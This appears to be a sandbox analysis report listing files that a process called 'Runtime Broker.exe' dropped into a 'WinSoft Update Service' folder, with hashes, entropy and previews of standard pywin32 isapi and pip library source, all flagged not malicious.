Preview:	# This extension is used mainly for testing purposes - it is not.# designed to be a simple sample, but instead is a hotch-potch of things.# that attempts to exercise the framework...from isapi import isapicon.from isapi.simple import SimpleExtension.import sys, os, stat..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# We use the same reload support as 'advanced.py' demonstrates..from isapi import InternalReloadException.import win32event, win32file, winerror, win32con, threading..# A watcher thread that checks for __file__ changing..# When it detects it, it simply sets "change_detected" to true..class ReloadWatcherThread(threading.Thread):. def __init__(self):. self.change_detected = False. self.filename = __file__. if self.filename.endswith("c") or self.filename.endswith("o"):. self.filename = self.filename[:-1]. self.handle = win32file.FindFirstChangeNotification(. os.path.dirname(self.filename),.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\simple.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2490
Entropy (8bit):	4.3916907940812795
Encrypted:	false
SSDEEP:	48:p2C72ZAC3m465Eu/4adcj961wkQZHm465XnLVPM66G4YS961NF:pPC3oEBj+wkWHoXLBaaS+NF
MD5:	CF7E9175662D34C2584F56DDEC4CFC73
SHA1:	EB66D8A7D796394A71DF38E0C0AC91DDABA6B4EA
SHA-256:	19603CD536D81653A48AE1E53CB4626BB98ABC0CBC78A7F358FA32DE9304A03C
SHA-512:	49F0C71DBFE929F71D36D4EAF1D8F4266774010C75B15042AB6E680E051653F2B84F9220C0116BE8F04EE58D93C459201866A518B4AC172A841AB39D34385F36
Malicious:	false
Preview:	"""Simple base-classes for extensions and filters...None of the filter and extension functions are considered 'optional' by the.framework. These base-classes provide simple implementations for the.Initialize and Terminate functions, allowing you to omit them,..It is not necessary to use these base-classes - but if you don't, you.must ensure each of the required methods are implemented.."""..class SimpleExtension:. "Base class for a simple ISAPI extension". def __init__(self):. pass.. def GetExtensionVersion(self, vi):. """Called by the ISAPI framework to get the extension version. . The default implementation uses the classes docstring to. set the extension description.""". # nod to our reload capability - vi is None when we are reloaded.. if vi is not None:. vi.ExtensionDesc = self.__doc__.. def HttpExtensionProc(self, control_block):. """Called by the ISAPI framework for each extension request.. .

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\test\README.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.312082029380059
Encrypted:	false
SSDEEP:	3:hMCESHQzFUl2kyLEI3KXmv2X7AINfAEeAvEHVJKBmJn:huSHQzDkywI3KXm47AINf+WmJn
MD5:	373DBA22E181540278BB56E9050BB0C2
SHA1:	D9BE10C58C89360D7100E763BE060A3DAAD5FC80
SHA-256:	D20657ECFB4483C745C06CC3554A853A002F86FA393538D5C08795A53BE13587
SHA-512:	BE7017875FDA7839C79B2F963EFDEE3B18465604906F707CC601F12C9B026CFE8FD1BD0F8852011236045D073E95E80DF4775A7FA31B0BABD170966602669AF8
Malicious:	false
Preview:	This is a directory for tests of the PyISAPI framework...For demos, please see the pyisapi 'samples' directory.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\test\extension_simple.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4480
Entropy (8bit):	4.664830808555661
Encrypted:	false
SSDEEP:	96:aQJY3CLzWzQHukYlUdIIPi4uH+OYMRQ6cWQYuAfQMi:aQUfuLYlUeIPi4ueOYA/dYsM
MD5:	4BDF26B2215F409A4D27163E44FA56C5
SHA1:	C59F85484D5BB57BD86EF35546332DF10492EA8A
SHA-256:	DC9500CB2191B4477F4DDBF6CADDAF701A377264A67EFA6A59C20005D987FCE6
SHA-512:	7C0FA5EC1EFCBDBC8F201B1F5511B6C37A21FFFC495D98E8B03D599C75C8FB9F12A01AECB5D8EE7239E11B42FBA8803739F6C9AE76637DA0C962317EF918BF2A
Malicious:	false
Preview:	# This is an ISAPI extension purely for testing purposes. It is NOT.# a 'demo' (even though it may be useful!).#.# Install this extension, then point your browser to:.# "http://localhost/pyisapi_test/test1".# This will execute the method 'test1' below. See below for the list of.# test methods that are acceptable...from isapi import isapicon, threaded_extension, ExtensionError.from isapi.simple import SimpleFilter.import traceback.import urllib.request, urllib.parse, urllib.error.import winerror..# If we have no console (eg, am running from inside IIS), redirect output.# somewhere useful - in this case, the standard win32 trace collector..import win32api.try:. win32api.GetConsoleTitle().except win32api.error:. # No console - redirect. import win32traceutil..# The ISAPI extension - handles requests in our virtual dir, and sends the.# response to the client..class Extension(threaded_extension.ThreadPoolExtension):. "Python ISAPI Tester". def Dispatch(self, ecb):. p

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\threaded_extension.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7214
Entropy (8bit):	4.5292849377379
Encrypted:	false
SSDEEP:	192:pjBkE/cXlsYMNKGxo9yU/tj4tcT6FnDVYt9TTqlk:pjxvYMN/SBV4tcTqnDVRk
MD5:	4D95C544913F523779F256E477697CF3
SHA1:	434541EDB0FCEE0A923D71FFCC3E93F4AB04C18E
SHA-256:	D1624412936A5CFE92AA8D7BB95814BC605D39C569CC22B090F2D735CF75FDA6
SHA-512:	256B208B551E3E166C5B0E921FDA662706E9CB9E6266275B7769B9CC8D281634EF7138E21E90DDB29B449D88EEE589715ADAB01C07A88498A0817D00C8299362
Malicious:	false
Preview:	"""An ISAPI extension base class implemented using a thread-pool.""".# $Id$..import sys.import time.from isapi import isapicon, ExtensionError.import isapi.simple.from win32file import GetQueuedCompletionStatus, CreateIoCompletionPort, \. PostQueuedCompletionStatus, CloseHandle.from win32security import SetThreadToken.from win32event import INFINITE.from pywintypes import OVERLAPPED..import threading.import traceback..ISAPI_REQUEST = 1.ISAPI_SHUTDOWN = 2..class WorkerThread(threading.Thread):. def __init__(self, extension, io_req_port):. self.running = False. self.io_req_port = io_req_port. self.extension = extension. threading.Thread.__init__(self). # We wait 15 seconds for a thread to terminate, but if it fails to,. # we don't want the process to hang at exit waiting for it.... self.setDaemon(True).. def run(self):. self.running = True. while self.running:. errCode, bytes, key, overla

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	455
Entropy (8bit):	4.989150781539261
Encrypted:	false
SSDEEP:	12:1VeiB8f1OvYB91t65XzsSQiASiuI+dCle2+LcJWGORMl:1szkvkt65bQdSLIeC6LcJWBRa
MD5:	E84C461324B98616A8E2ABA36FF95C2B
SHA1:	B28FCD6D0A25BE968CE6ADCBE302A0155523514D
SHA-256:	48C96FD18680B47869E0E780043B1DBD91750F42881BC5B2F1F645D7F6CEF059
SHA-512:	2F7C7BCC273CB98E484775C93E9E4DB045DA1E9F41DBBE2E07DDC876EB0A06C4F053B306682893DD80442C77C817FB36CFA0E6DB8BD012C1C50AFB0788EB74F6
Malicious:	false
Preview:	from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional...__version__ = "20.3.3"...def main(args=None):. # type: (Optional[List[str]]) -> int. """This is an internal API only meant for use by pip's own console scripts... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\__main__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.662719201307775
Encrypted:	false
SSDEEP:	24:1R2nXNNqdv0leHA/4cJFtib00bQNcaG/v:P+vqileg/4cXtOLaGn
MD5:	5CD1FBEFADF9DE0E4355BFB8A9854645
SHA1:	C3BBCD8D4A6A93F0FCB956F20EB5BCC435E8C994
SHA-256:	6EA080335723D47C07083C775896BE2C9C4E0578A61B113C3A306A02F9E1560D
SHA-512:	38C8AD30AEC5B73224B9FE0A2FE6B08402901E1C2226480196096433233829A1C28EC6A95EBF3044110C42636E868614D3D7D93A9C0DA363B37DAF76FEA614B2
Malicious:	false
Preview:	from __future__ import absolute_import..import os.import sys..# Remove '' and current working directory from the first entry.# of sys.path, if present to avoid using current directory.# in pip commands check, freeze, install, list and show,.# when invoked as python -m pip <command>.if sys.path[0] in ('', os.getcwd()):. sys.path.pop(0)..# If we are running from a wheel, add the wheel to sys.path.# This allows the usage python pip-.whl/pip install pip-.whl.if __package__ == '':. # __file__ is pip-*.whl/pip/__main__.py. # first dirname call strips of '/__main__.py', second strips off '/pip'. # Resulting path is the name of the wheel itself. # Add that to sys.path so we can import pip. path = os.path.dirname(os.path.dirname(__file__)). sys.path.insert(0, path)..from pip._internal.cli.main import main as _main # isort:skip # noqa..if __name__ == '__main__':. sys.exit(_main()).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	495
Entropy (8bit):	4.884925515531525
Encrypted:	false
SSDEEP:	12:7KVeiB8f1OvYB9mt65XzQRro+dCle2+LcJWGORMl:GVezkvNt65URroeC6LcJWBRa
MD5:	B2F1F5FCA106FCF21C8564DC3BD5BEC4
SHA1:	9828A04C5AEFE088DD176BA7E6A60773EF9C080C
SHA-256:	4DE5F235E28B77B1044E37F7949006498D436FE75803A6BFC422C75949049970
SHA-512:	0483F4DDEEE512170F6C392294847C22F8637F0970F4F1C887593EBD64AC0AD452460B131DBE01B67A28DA5905F2756F9EB13881C5528C70F8854B74A6F33164
Malicious:	false
Preview:	import pip._internal.utils.inject_securetransport # noqa.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional...def main(args=None):. # type: (Optional[List[str]]) -> int. """This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\build_env.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	8089
Entropy (8bit):	4.418287170915266
Encrypted:	false
SSDEEP:	96:SE4mzkqdHlfGx6ao4dyRSPzfgPbqspnmviYssjICe0viV:SxGkqdFfGRo4USrfguhwsjICG
MD5:	BEE9E37F89B898C91B14E34155ACEF7E
SHA1:	9D77A286ACD9700E297EC43BE676C39F17626002
SHA-256:	E4F74956546F0DEF9F9867DCFF0A8E5AD43D01DF609B6125C1FCB6579695BA2A
SHA-512:	50B2342DB757B703D9B6837B9FA92E2439E96FA9908210710589A10644E73AF9086E70118335C5A90963E3D7A4E84909A585B09A18B7A89A2D38E3FA984F9DFF
Malicious:	false
Preview:	"""Build Environment used for isolation during sdist building."""..import logging.import os.import sys.import textwrap.from collections import OrderedDict.from distutils.sysconfig import get_python_lib.from sysconfig import get_paths..from pip._vendor.pkg_resources import Requirement, VersionConflict, WorkingSet..from pip import __file__ as pip_location.from pip._internal.cli.spinners import open_spinner.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory, tempdir_kinds.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from types import TracebackType. from typing import Iterable, List, Optional, Set, Tuple, Type.. from pip._internal.index.package_finder import PackageFinder..logger = logging.getLogger(__name__)...class _Prefix:.. def __init__(self, path):. # type: (str) -> None. self.path = path. self.setup = False. self.bin_dir = get_paths(.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cache.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	12249
Entropy (8bit):	4.448869778149467
Encrypted:	false
SSDEEP:	192:Gswb4Y6IP5zSw04o14PynfUsThrc2uLFw5+MshjOibHbhz7pAiyka8T+h:u8Y6IP5zSw04o14PynfUs1rc2uLFw57f
MD5:	FBEDC96FDDEA30E71FCCAC2644EB8007
SHA1:	6A2867FA28CF1CBC4293F8E863A238E4221CC7DB
SHA-256:	1C34E31AB9B9EC597EBEEA2321C2F5EFBE382910A5EBABAE3576809B003C1CB4
SHA-512:	4B72D856A16EBF44D7A56AD98BFC00F320F44079DECD09F3D22CA48269AD00210C4E93862D8BCB407A9C106F61C9F244E719045422FF5EED7352DF0D38C51F04
Malicious:	false
Preview:	"""Cache Management."""..import hashlib.import json.import logging.import os..from pip._vendor.packaging.tags import interpreter_name, interpreter_version.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InvalidWheelFilename.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.utils.temp_dir import TempDirectory, tempdir_kinds.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import path_to_url..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, List, Optional, Set.. from pip._vendor.packaging.tags import Tag.. from pip._internal.models.format_control import FormatControl..logger = logging.getLogger(__name__)...def _hash_dict(d):. # type: (Dict[str, str]) -> str. """Return a stable sha224 of a dictionary.""". s = json.dumps(d, sort_keys=True, separators=(",", ":"), ensure_ascii=True). return hashlib.sha224(s.encode("ascii")).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	132
Entropy (8bit):	4.33775413372005
Encrypted:	false
SSDEEP:	3:FEGWgGtM4LCFgJv8tLzC8MlXl2FD2H3OVQ7RVc7yQbQxPo:FvWgG+vg18tLgN4/Venc7yQ8xg
MD5:	F0AC37F23494412689AEE309275C45FB
SHA1:	C98BBA03EBC076049B09E2A3168633079A3EA7B1
SHA-256:	1641C1829C716FEFE077AAF51639CD85F30ECC0518C97A17289E9A6E28DF7055
SHA-512:	4B65E60D8D9D0E63D44B2F49BE01A062CE68FDAE5C962D5AF009E3358EDD5C18BDE6D754846CC005C67811C9310DDC7EADD818002AED79CA3EA452384A176973
Malicious:	false
Preview:	"""Subpackage containing all of pip's command line interface related code."""..# This file intentionally does not import submodules.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\autocompletion.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6547
Entropy (8bit):	4.478299133912401
Encrypted:	false
SSDEEP:	96:sVBczkXuhbT2B/ic4p+bJmL8RopodmTlcd96U1WRXb:KBQkXmbTnpZQFRd9T1WRXb
MD5:	9EE230DD6322924AC836DBA8898DDFE6
SHA1:	715637BE57D88437BA52B80192EBB1B56E7B923F
SHA-256:	7A418DB5C0C8D29EEB15573EEECE13F536ECB382606FBBEC07AE3D5C921B9518
SHA-512:	3FA51F47593F0F2F47B159197F262ED6D79595C8306830E3415F2B721D2FF56C6FE9924D8E48147F9EE4ECA98A18220981CA777285176AD8DE473E69AB4B956C
Malicious:	false
Preview:	"""Logic that powers autocompletion installed by ``pip completion``.."""..import optparse.import os.import sys.from itertools import chain..from pip._internal.cli.main_parser import create_main_parser.from pip._internal.commands import commands_dict, create_command.from pip._internal.utils.misc import get_installed_distributions.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Iterable, List, Optional...def autocomplete():. # type: () -> None. """Entry Point for completion of main and subcommand options.. """. # Don't complete if user hasn't sourced bash_completion file.. if 'PIP_AUTO_COMPLETE' not in os.environ:. return. cwords = os.environ['COMP_WORDS'].split()[1:]. cword = int(os.environ['COMP_CWORD']). try:. current = cwords[cword - 1]. except IndexError:. current = ''.. parser = create_main_parser(). subcommands = list(commands_dict). options = [].. # subcommand

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\base_command.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9375
Entropy (8bit):	4.485656052614562
Encrypted:	false
SSDEEP:	96:3MWh/m1Jamz/wbqJ5/atSsdhdkXxHY1nXyenj+aGlBZPUAxlBArgPeQZ7Ts7923g:8NJaGYZSsdhJ1NFlOZ04gmGMK
MD5:	3622948F18F8819E93FC9C64202D1A0F
SHA1:	B20C63DD181CBDC7A6C5B9C6ABE8C982A076417D
SHA-256:	35425E86CF541BEE14D495E01D431E4361759FC56B9C385B4A3494A7E8820D81
SHA-512:	EF74B494BFCD09AC16ADE2DE3E4E5B9050133F932D0121EC0BD6649698A0C87E59ED667D06B6EF6BBD9BC5F35B82261A73D2A266098ED9589B9382B961BE670C
Malicious:	false
Preview:	"""Base Command class, and related routines"""..from __future__ import absolute_import, print_function..import logging.import logging.config.import optparse.import os.import platform.import sys.import traceback..from pip._vendor.six import PY2..from pip._internal.cli import cmdoptions.from pip._internal.cli.command_context import CommandContextMixIn.from pip._internal.cli.parser import ConfigOptionParser, UpdatingDefaultsHelpFormatter.from pip._internal.cli.status_codes import (. ERROR,. PREVIOUS_BUILD_DIR_ERROR,. UNKNOWN_ERROR,. VIRTUALENV_NOT_FOUND,.).from pip._internal.exceptions import (. BadCommand,. CommandError,. InstallationError,. NetworkConnectionError,. PreviousBuildDirError,. SubProcessError,. UninstallationError,.).from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filesystem import check_path_owner.from pip._internal.utils.logging import BrokenStdoutLoggingError, setup_logging.from pip._internal.utils.misc impo

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\cmdoptions.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	28618
Entropy (8bit):	4.704470367902003
Encrypted:	false
SSDEEP:	384:DdNdDnX2tjMhpbxY6D2WK1BeEINZ/1FJYBkAyKbSgPQIlAOevhRxB0:DdHDnX2tIhpOGoB1INZSmiSsGO+A
MD5:	317AFC4A0D130F4A4B37CDB2A959E63B
SHA1:	8199A7EC77EDA696F1686444B78009832E05D4FB
SHA-256:	17ADB2160C6E16866E6E01759E2D080E1E2310ED572594EBB2B63AD7A36A0554
SHA-512:	72EB8C62A8A91539CE2A6366D592A4E1DFC9361611134D126A60ABFDB856A0AFECF03A850CE7DF49C2045FB1EEB3F35C7BC668F77DCB9A417CBC36C5561ABD04
Malicious:	false
Preview:	""".shared options and groups..The principle here is to define options once, but not instantiate them.globally. One reason being that options with action='append' can carry state.between parses. pip parses general options twice internally, and shouldn't.pass on state. To be consistent, all options will follow this design.."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..from __future__ import absolute_import..import os.import textwrap.import warnings.from distutils.util import strtobool.from functools import partial.from optparse import SUPPRESS_HELP, Option, OptionGroup.from textwrap import dedent..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli.progress_bars import BAR_TYPES.from pip._internal.exceptions import CommandError.from pip._internal.locations import USER_CACHE_DIR, get_src_prefix.from pip._internal.models.format_control import FormatControl.from pip._internal.models.index import Py

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\command_context.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	975
Entropy (8bit):	4.607477403675421
Encrypted:	false
SSDEEP:	12:1oPdFj8L/eiB8f1OvYBpnIMi8NM1Ao9irxuBMaail/vFFNbeHBIG3oQ9j16rIw:1OdSezkvSnnbYAo8roGaaihGBXyn
MD5:	5C808203BDC30852020A89A9AC7C1026
SHA1:	F8ACD017D8989CD782ECE179F7EE9CADEE349EC5
SHA-256:	935547A9309E6234346F7B72AA2513A00DC09F9171A509A8E6B6FEF401C9E956
SHA-512:	5537B68C123F47F7072D07D7E0B084B30F4282ABFA1C1CC27313C61C1DA8C0541BEFDD768E627D7E85EC5F4099481B886B3562C7F2FE37C7FF30DA7582379403
Malicious:	false
Preview:	from contextlib import contextmanager..from pip._vendor.contextlib2 import ExitStack..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import ContextManager, Iterator, TypeVar.. _T = TypeVar('_T', covariant=True)...class CommandContextMixIn(object):. def __init__(self):. # type: () -> None. super(CommandContextMixIn, self).__init__(). self._in_main_context = False. self._main_context = ExitStack().. @contextmanager. def main_context(self):. # type: () -> Iterator[None]. assert not self._in_main_context.. self._in_main_context = True. try:. with self._main_context:. yield. finally:. self._in_main_context = False.. def enter_context(self, context_provider):. # type: (ContextManager[_T]) -> _T. assert self._in_main_context.. return self._main_context.enter_context(context_provider).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\main.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2616
Entropy (8bit):	4.702864514265239
Encrypted:	false
SSDEEP:	48:R7AzkoHtIirrdVBUEkp+bu020hhrf8ovXs9ehw3:1AzkoN/ndVTkLM9vXs9ee3
MD5:	66763AB952D947165B2BC3A980173310
SHA1:	2926C1D2CCE8CFF7EFAD7BCA07972D3A97334B6A
SHA-256:	1F173D759C96DF1883B18657FBF2767065D3E4358D2CD9FF63BA3DA1499EF847
SHA-512:	3A66ED714FBA1DA3A3DD1046897AF99EC3338580D1C60B5E0062CAF5A06ED9997DA43FAAEE245B52D32960B09A1F0ED9D4CE7A1E518ADB37216325D5465D0684
Malicious:	false
Preview:	"""Primary application entrypoint..""".from __future__ import absolute_import..import locale.import logging.import os.import sys..from pip._internal.cli.autocompletion import autocomplete.from pip._internal.cli.main_parser import parse_command.from pip._internal.commands import create_command.from pip._internal.exceptions import PipError.from pip._internal.utils import deprecation.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional..logger = logging.getLogger(__name__)...# Do not import and use main() directly! Using it directly is actively.# discouraged by pip's maintainers. The name, location and behavior of.# this function is subject to change, so calling it directly is not.# portable across different pip versions...# In addition, running pip in-process is unsupported and unsafe. This is.# elaborated in detail at.# https://pip.pypa.io/en/stable/user_guide/#using-pip-from-your-program..# That document also provides s

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\main_parser.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2830
Entropy (8bit):	4.733485601919989
Encrypted:	false
SSDEEP:	48:OyIEml0OQk9rzkVIY0/qYp7fe7VnlU+atKLprPY9Hll5OrKr8Kc797Cs9UUaBMtB:XIEmXHzkhYpTeRnlCULpril5OGZc7tCq
MD5:	1137EA3095AE858FBA88E31199319180
SHA1:	44EF08D9486A8C118EB038F7237F71F41C6C4C67
SHA-256:	41251BBB974F677A71B260A19E8F1E1F5EA467101C5241B2F187021BF79E1AB7
SHA-512:	081B0D52F6B5BECFBCE04884ACAF2E0CDE8F889490A43C7D2613DB432B312E0B0C2E2FDB965053E692E0B828C174455E76FE3E1B1AFC4AC97A7C6EC9A7C4CF62
Malicious:	false
Preview:	"""A single place for constructing and exposing the main parser."""..import os.import sys..from pip._internal.cli import cmdoptions.from pip._internal.cli.parser import ConfigOptionParser, UpdatingDefaultsHelpFormatter.from pip._internal.commands import commands_dict, get_similar_commands.from pip._internal.exceptions import CommandError.from pip._internal.utils.misc import get_pip_version, get_prog.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Tuple...__all__ = ["create_main_parser", "parse_command"]...def create_main_parser():. # type: () -> ConfigOptionParser. """Creates and returns the main parser for pip's CLI. """.. parser_kw = {. 'usage': '\n%prog <command> [options]',. 'add_help_option': False,. 'formatter': UpdatingDefaultsHelpFormatter(),. 'name': 'global',. 'prog': get_prog(),. }.. parser = ConfigOptionParser(**parser_kw). parser.disable_interspersed_args(

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\parser.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.339835430831712
Encrypted:	false
SSDEEP:	192:TKgngmkDhxzyzS6AqCpFKeOIlRXW/RGJU:ugngV8jcQeOIlRXW/AU
MD5:	B2E045435B41B00BFFD992B71DFBB4AD
SHA1:	151B8AD4A364A2CC8C60A1E1E2CD37910FC2747F
SHA-256:	9DED8E1FB077C527863D47A5664450DFC4EFF61AB297FFEC8323623F73F9E7E5
SHA-512:	FAFF5EA92E42A21E8F50FC18A7793F2101AEBC5E839DB735B09C22C99EBAC81BC9F4A444A2687E3ADA4244D414585D870F71099030AA002AF36CF43B729A0B6B
Malicious:	false
Preview:	"""Base option parser setup"""..# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import logging.import optparse.import sys.import textwrap.from distutils.util import strtobool..from pip._vendor.contextlib2 import suppress.from pip._vendor.six import string_types..from pip._internal.cli.status_codes import UNKNOWN_ERROR.from pip._internal.configuration import Configuration, ConfigurationError.from pip._internal.utils.compat import get_terminal_size.from pip._internal.utils.misc import redact_auth_from_url..logger = logging.getLogger(__name__)...class PrettyHelpFormatter(optparse.IndentedHelpFormatter):. """A prettier/less verbose help formatter for optparse.""".. def __init__(self, args, *kwargs):. # help position must be aligned with __init__.parseopts.description. kwargs['max_help_position'] = 30. kwargs['indent_increment'] = 1. kwargs['width'] = get_t

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\progress_bars.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9121
Entropy (8bit):	4.646890614720267
Encrypted:	false
SSDEEP:	96:7h/zkEFJekRpXkzOsASbJxetQ5WgdlWj3K09daJ9yl2vlAr+kdd0r2Sp0EMfwp6D:7Nk6ZSve0lW7szjvSr+ku0EV2DjII
MD5:	827BAC3DBE0BB62CAC00F37F89881308
SHA1:	9FC0472D9B23C56467BF6F02726830C26BAD197C
SHA-256:	275CF292DD8B23881B05E5E8ADF6119985791605E1716E31DEBEB113F6BB67B7
SHA-512:	9E96C46A4127532C452CF63329AD8B338E7ED8F0E1431E67DABA797F5CCA0CFE9BCB961DCF9EA8B6585DE2275698533038E5DBF940700B98B805A6A5A3635332
Malicious:	false
Preview:	from __future__ import division..import itertools.import sys.from signal import SIGINT, default_int_handler, signal..from pip._vendor import six.from pip._vendor.progress.bar import Bar, FillingCirclesBar, IncrementalBar.from pip._vendor.progress.spinner import Spinner..from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.logging import get_indentation.from pip._internal.utils.misc import format_size.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, List..try:. from pip._vendor import colorama.# Lots of different errors can come from this, including SystemError and.# ImportError..except Exception:. colorama = None...def _select_progress_class(preferred, fallback):. # type: (Bar, Bar) -> Bar. encoding = getattr(preferred.file, "encoding", None).. # If we don't know what encoding this file is in, then we'll just assume. # that it doesn't support unicode and use the ASCII bar.. if not

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\req_command.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	16455
Entropy (8bit):	4.340705804997316
Encrypted:	false
SSDEEP:	192:gt/4JkcmtQSyErM/b5x6i0LXeJwQJ8jFilPm:2/4ctQSlrM3UEwQJ8joFm
MD5:	C6AFF88C20A7F28141F90AE903E9B635
SHA1:	B7C7A36B7368FAAFD56509CF8020AACDC7E317F0
SHA-256:	FD6346924BE7B8FDB5D037195D6454CC9F3031834D410D8DC3D9863A71C21D2E
SHA-512:	3F44A6FC4FDEEF650F859BE9374C1C9F2FDD2FECD1AEEE9C2D3A11AE35BCA7B3C84D18D0DA9175EA54398ABAF9E77870995C6E46CE4CECE825572EBB8998B9F8
Malicious:	false
Preview:	"""Contains the Command base classes that depend on PipSession...The classes in this module are in a separate module so the commands not.needing download / PackageFinder capability don't unnecessarily import the.PackageFinder machinery and all its vendored dependencies, etc.."""..import logging.import os.from functools import partial..from pip._vendor.six import PY2..from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.command_context import CommandContextMixIn.from pip._internal.exceptions import CommandError, PreviousBuildDirError.from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.network.session import PipSession.from pip._internal.operations.prepare import RequirementPreparer.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_fr

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\spinners.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5509
Entropy (8bit):	4.577039715072395
Encrypted:	false
SSDEEP:	96:xG1rzkOmT/fBrzcBXb8M8+tcTR5gc57+8EjKiccHtFW9jfO:x4kzBcBXwM8+twOFazO
MD5:	94DCDDFDE192B6A2A9B89308BEE85709
SHA1:	C1B11204DAFC02A377C4C6BC32BBBEBFDC7A96FD
SHA-256:	19441634F9C10F5093447C71BA6BD4C28747A2F22FA1F301BBE6E46926949D06
